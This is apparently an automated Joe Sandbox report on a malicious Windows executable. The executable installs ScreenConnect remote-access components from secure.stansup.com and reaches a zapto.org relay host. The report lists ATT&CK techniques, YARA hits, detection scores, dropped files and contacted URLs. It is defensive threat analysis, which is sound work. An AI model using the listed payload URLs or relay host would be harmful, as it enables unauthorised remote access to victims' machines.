Source: C:\Users\user\Desktop\Qjq85KfhBC.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
Source: Yara match File source: 10.0.ScreenConnect.WindowsClient.exe.f70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.1741616097.0000000000F72000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2221493797.0000021CD051A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1754297358.000000000328F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dfsvc.exe PID: 7740, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4228, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 2788, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, type: DROPPED
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 121 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Inhibit System Recovery |
| Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | 1 DLL Search Order Hijacking | 1 DLL Search Order Hijacking | 1 Obfuscated Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 2 Windows Service | 2 Windows Service | 1 Install Root Certificate | Security Account Manager | 34 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 12 Process Injection | 1 Timestomp | NTDS | 51 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Bootkit | 1 Scheduled Task/Job | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Search Order Hijacking | Cached Domain Credentials | 51 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 51 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Hidden Users | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
| Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Bootkit | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking |
[Behavior graph (image not reproduced): Behavior Graph ID: 1542315, Sample: Qjq85KfhBC.exe, Startdate: 25/10/2024, Architecture: WINDOWS, Score: 60]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| Qjq85KfhBC.exe | 24% | ReversingLabs | Win32.Trojan.Generic | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Client.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.ClientService.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.ClientService.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Core.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Windows.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | | |
                  No Antivirus matches
                  No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | |
| http://www.w3.or | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2005/02/trust | 0% | URL Reputation | safe | |
| http://www.w3.o | 0% | URL Reputation | safe | |
| http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2004/09/policy | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | 0% | URL Reputation | safe | |
| http://upx.sf.net | 0% | URL Reputation | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| secure.stansup.com | 79.110.49.185 | true | false | | unknown |
| kjh231a.zapto.org | 79.110.49.185 | true | false | | unknown |
| default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.57.21 | true | false | | unknown |
| fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe | false | | unknown |
| https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config | false | | unknown |
| https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.config | false | | unknown |
| https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.config | false | | unknown |
| https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe | false | | unknown |
| https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe | false | | unknown |
| https://secure.stansup.com/Bin/ScreenConnect.ClientService.dll | false | | unknown |
| https://secure.stansup.com/Bin/ScreenConnect.Client.dll | false | | unknown |
| https://secure.stansup.com/Bin/ScreenConnect.Windows.dll | false | | unknown |
| https://secure.stansup.com/Bin/ScreenConnect.Client.manifest | false | | unknown |
| https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe | false | | unknown |
| https://secure.stansup.com/Bin/ScreenConnect.Core.dll | false | | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                          unknown
                                                                                                          https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.adfsvc.exe, 00000001.00000002.2221493797.0000021CD051A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://account.live.com/msangcwamsvchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384073807.000001E11B957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://login.microsoftonline.com/MSARSsvchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://secure.stansup.com/Bin/ScreenConnect.Client.applicationpdfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://www.w3.ordfsvc.exe, 00000001.00000002.2221493797.0000021CD081A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD051A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD083D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD08A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752587348.0000000001622000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://secure.stansup.com/Bin/ScreenConnect.Client.applicationtmdfsvc.exe, 00000001.00000002.2240600621.0000021CEA969000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://crl.ver)svchost.exe, 00000007.00000002.2607269224.000002074AC00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605859392.000001E11B0D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxsvchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://passport.net/tbsvchost.exe, 00000008.00000003.1455371851.000001E11BE3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B0F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://secure.staPdfsvc.exe, 00000001.00000002.2221493797.0000021CD0924000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://account.live.com/Wizard/Password/Change?id=80601Authsvchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfsvchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd04/01svchost.exe, 00000008.00000003.1417148795.000001E11B952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80605teAccountCsvchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdssvchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://secure.stansup.com/Bin/ScreenConnect.Windodfsvc.exe, 00000001.00000002.2221493797.0000021CD0924000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://secure.stansup.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.or3Q2U6NXT.log.1.drfalse
                                                                                                                                          unknown
                                                                                                                                          https://g.live.com/odclientsettings/Prod-C:edb.log.7.drfalse
                                                                                                                                            unknown
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000008.00000002.2606537340.000001E11BE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://secure.stansup.com/Bin/ScreenConnect.Windows.dllLdfsvc.exe, 00000001.00000002.2239737047.0000021CEA8E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdessvchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://login.microsoftonline.com/MSARSEntesvchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSIDsvchost.exe, 00000008.00000003.1383787727.000001E11B910000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383787727.000001E11B910000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/09/policysrfsvchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000008.00000002.2606257745.000001E11B937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1416236491.000001E11B955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://Passport.NET/STSsvchost.exe, 00000008.00000002.2606300505.000001E11B977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.configHWdfsvc.exe, 00000001.00000002.2240921151.0000021CEA9A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://docs.oasis-open.org/wss/2svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000001.00000002.2221493797.0000021CD02B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&id=80603rfsvchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://secure.stansup.com/Bin/ScreenConnect.Client.applicatQjq85KfhBC.exe, 00000000.00000002.1445501228.000000000109C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.configrW6zdfsvc.exe, 00000001.00000002.2240921151.0000021CEA9A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://www.w3.odfsvc.exe, 00000001.00000002.2221493797.0000021CD081A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          http://Passport.NET/tbsvchost.exe, 00000008.00000003.1433983414.000001E11B959000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606505484.000001E11BE36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1417812360.000001E11B930000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1449639366.000001E11B077000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1417812360.000001E11B929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605566534.000001E11B07A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606146070.000001E11B902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1449163032.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1417148795.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1416236491.000001E11B955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlepksvchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://signup.live.com/signup.aspxsvchost.exe, 00000008.00000003.1383839850.000001E11B955000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B92C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000008.00000003.1455330524.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B102000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe:Udfsvc.exe, 00000001.00000002.2240921151.0000021CEA9A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000008.00000003.1449293708.000001E11B92B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606257745.000001E11B937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1433346941.000001E11B92B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1416236491.000001E11B955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
79.110.49.185 | secure.stansup.com | Germany | 57287 | OTAVANET-ASCZ | false

IP
127.0.0.1
                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                              Analysis ID:1542315
                                                                                                                                                                                                              Start date and time:2024-10-25 19:26:10 +02:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:0h 8m 23s
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Number of analysed new started processes analysed:17
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:Qjq85KfhBC.exe
                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                              Original Sample Name:a43cca6cc162e4b68f0844d507f5300216e6ced88af03fabedc1d053d743064d(1).exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal60.evad.winEXE@18/77@2/2
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 83.3%
                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                              • Successful, ratio: 73%
                                                                                                                                                                                                              • Number of executed functions: 285
                                                                                                                                                                                                              • Number of non-executed functions: 28
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 40.126.32.133, 20.190.160.14, 40.126.32.76, 40.126.32.136, 20.190.160.20, 40.126.32.140, 20.190.160.22, 40.126.32.138, 217.20.57.21, 192.229.221.95, 184.28.90.27, 13.89.179.12, 93.184.221.240
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, cacerts.digicert.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                              • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 2788 because it is empty
                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
